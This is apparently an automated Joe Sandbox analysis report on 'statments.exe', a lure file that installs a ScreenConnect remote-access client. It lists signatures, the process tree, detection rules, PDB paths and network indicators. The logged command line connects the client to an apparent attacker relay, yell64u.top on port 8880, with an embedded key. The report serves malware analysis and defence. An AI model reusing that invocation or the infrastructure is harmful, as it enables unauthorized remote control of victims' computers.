Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
statments.exe

Overview

General Information

Sample name:statments.exe
Analysis ID:1536325
MD5:95c83010549bc9fe36a625307cf6cd8d
SHA1:67cf78f35d20ba6a07ce771f6092f1efd314e122
SHA256:85276b1893f8307a681f8c8b22c6d7eaa40620afcf987a7a22a4ab39f7300253
Tags:exeuser-malwarology
Infos:

Detection

ScreenConnect Tool
Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statments.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\statments.exe" MD5: 95C83010549BC9FE36A625307CF6CD8D)
    • msiexec.exe (PID: 5308 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 1996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3340 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2288 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 5572 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3364 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6468 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 6792 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 3836 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
statments.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\4d36d9.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Installer\MSI3C18.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    1.2.statments.exe.5740000.10.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      10.0.ScreenConnect.WindowsClient.exe.700000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        10.2.ScreenConnect.WindowsClient.exe.2b6fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          1.0.statments.exe.4d5db8.2.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            1.2.statments.exe.5740000.10.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c=", ProcessId: 6468, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 1996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_03A416F8 CryptProtectData,8_2_03A416F8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_03A416F1 CryptProtectData,8_2_03A416F1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051A2D70 CryptUnprotectData,8_2_051A2D70
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051A2D68 CryptUnprotectData,8_2_051A2D68
                              Source: C:\Users\user\Desktop\statments.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\statments.exeEXE: msiexec.exeJump to behavior
                              Source: statments.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: statments.exeStatic PE information: certificate valid
                              Source: statments.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statments.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statments.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677160184.0000000000F80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677294239.0000000000FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statments.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1608297355.00000000005AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1575096863.0000000004250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statments.exe, MSI3C18.tmp.3.dr, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI3C77.tmp.3.dr, MSI3F66.tmp.3.dr, 4d36d9.rbs.3.dr, 4d36da.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statments.exe, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI2F66.tmp.2.dr, 4d36da.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statments.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.8:49706 -> 85.239.34.190:8880
                              Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: yell64u.top
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2793225366.00000000015DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
